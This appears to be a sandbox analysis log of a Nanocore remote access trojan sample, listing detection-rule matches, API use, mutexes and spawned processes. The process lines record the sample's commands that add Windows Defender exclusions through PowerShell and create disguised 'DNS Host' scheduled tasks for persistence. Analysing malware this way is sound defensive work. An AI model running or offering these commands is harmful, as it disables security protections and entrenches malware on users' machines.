Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: dnshost.exe PID: 7800, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: dnshost.exe PID: 7800, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: nD2ozRD7MN.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dnshost.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, --qVxXNKnhAcArgJoGGYXiyyQ--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, --qVxXNKnhAcArgJoGGYXiyyQ--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, --qVxXNKnhAcArgJoGGYXiyyQ--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, --qVxXNKnhAcArgJoGGYXiyyQ--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.nD2ozRD7MN.exe.4a9a7a0.2.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, Xkj9BfuZTQp0G2lgKt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, Xkj9BfuZTQp0G2lgKt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.nD2ozRD7MN.exe.7ea0000.5.raw.unpack, Xkj9BfuZTQp0G2lgKt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nD2ozRD7MN.exe.49b1760.3.raw.unpack, hZt63p0jP4sfuIZbVJ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack, --qjIje6jGWLd2EOkfZXKqBbg--.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@29/29@0/1

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

File created: C:\Program Files (x86)\DNS Host

Jump to behavior

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nD2ozRD7MN.exe.log

Jump to behavior

Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{a376f716-2f77-4943-a431-3a3bcb53b7c0}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5016

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmfjbfr1.d2r.ps1

Jump to behavior

Source: nD2ozRD7MN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: nD2ozRD7MN.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nD2ozRD7MN.exe, 00000000.00000000.1999252645.0000000000A72000.00000002.00000001.01000000.00000003.sdmp, dnshost.exe.5.dr	Binary or memory string: INSERT INTO Service (CustomerId, Active, Date) VALUES (@customerId, '1', @date);
Source: nD2ozRD7MN.exe, 00000000.00000000.1999252645.0000000000A72000.00000002.00000001.01000000.00000003.sdmp, dnshost.exe.5.dr	Binary or memory string: SELECT COUNT(*) FROM Service WHERE (Active LIKE '1') AND (CustomerId = @id);

Source: nD2ozRD7MN.exe	ReversingLabs: Detection: 50%
Source: nD2ozRD7MN.exe	Virustotal: Detection: 38%

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

File read: C:\Users\user\Desktop\nD2ozRD7MN.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\nD2ozRD7MN.exe "C:\Users\user\Desktop\nD2ozRD7MN.exe"
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Users\user\Desktop\nD2ozRD7MN.exe "C:\Users\user\Desktop\nD2ozRD7MN.exe"
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DNS Host Task" /xml "C:\Users\user\AppData\Local\Temp\tmpC8C1.tmp"
Source: unknown	Process created: C:\Users\user\Desktop\nD2ozRD7MN.exe C:\Users\user\Desktop\nD2ozRD7MN.exe 0
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Users\user\Desktop\nD2ozRD7MN.exe "C:\Users\user\Desktop\nD2ozRD7MN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Program Files (x86)\DNS Host\dnshost.exe "C:\Program Files (x86)\DNS Host\dnshost.exe" 0
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files (x86)\DNS Host\dnshost.exe"
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Program Files (x86)\DNS Host\dnshost.exe "C:\Program Files (x86)\DNS Host\dnshost.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DNS Host\dnshost.exe "C:\Program Files (x86)\DNS Host\dnshost.exe"
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Program Files (x86)\DNS Host\dnshost.exe "C:\Program Files (x86)\DNS Host\dnshost.exe"
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1960
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Users\user\Desktop\nD2ozRD7MN.exe "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DNS Host Task" /xml "C:\Users\user\AppData\Local\Temp\tmpC8C1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Users\user\Desktop\nD2ozRD7MN.exe "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files (x86)\DNS Host\dnshost.exe"
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Program Files (x86)\DNS Host\dnshost.exe "C:\Program Files (x86)\DNS Host\dnshost.exe"
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Program Files (x86)\DNS Host\dnshost.exe "C:\Program Files (x86)\DNS Host\dnshost.exe"

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
